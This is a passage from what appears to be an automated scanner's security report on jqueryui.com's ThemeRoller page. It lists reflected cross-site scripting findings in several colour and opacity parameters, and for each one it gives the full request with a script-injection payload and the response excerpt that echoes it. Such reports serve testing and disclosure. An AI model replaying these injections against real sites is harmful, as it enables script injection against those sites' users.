Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4c61"><script>alert(1)</script>5c7875cd310 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDDc4c61"><script>alert(1)</script>5c7875cd310&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
eroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDDc4c61"><script>alert(1)</script>5c7875cd310&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&b
...[SNIP]...

3.17. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 473b0"><script>alert(1)</script>d66d5d90bc9 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C473b0"><script>alert(1)</script>d66d5d90bc9&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C473b0"><script>alert(1)</script>d66d5d90bc9&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityEr
...[SNIP]...

3.18. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e76d"><script>alert(1)</script>50ee2f3037a was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF3e76d"><script>alert(1)</script>50ee2f3037a&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF3e76d"><script>alert(1)</script>50ee2f3037a&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&bor
...[SNIP]...

3.19. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f2b5"><script>alert(1)</script>576b6389ccd was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=0000008f2b5"><script>alert(1)</script>576b6389ccd&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=0000008f2b5"><script>alert(1)</script>576b6389ccd&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&
...[SNIP]...

3.20. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ded7"><script>alert(1)</script>e2d451684 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD4ded7"><script>alert(1)</script>e2d451684&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120316

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
at.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD4ded7"><script>alert(1)</script>e2d451684&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.21. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11a4e"><script>alert(1)</script>52f07625338 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=10011a4e"><script>alert(1)</script>52f07625338&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=10011a4e"><script>alert(1)</script>52f07625338&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333
...[SNIP]...

3.22. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995ba"><script>alert(1)</script>4c057cb328e was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100995ba"><script>alert(1)</script>4c057cb328e&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
DD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100995ba"><script>alert(1)</script>4c057cb328e&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconCo
...[SNIP]...

3.23. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ebc5"><script>alert(1)</script>eac71f79849 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=502ebc5"><script>alert(1)</script>eac71f79849&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
TextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=502ebc5"><script>alert(1)</script>eac71f79849&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=F
...[SNIP]...

3.24. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d26"><script>alert(1)</script>9819ffd82a was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100f7d26"><script>alert(1)</script>9819ffd82a&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
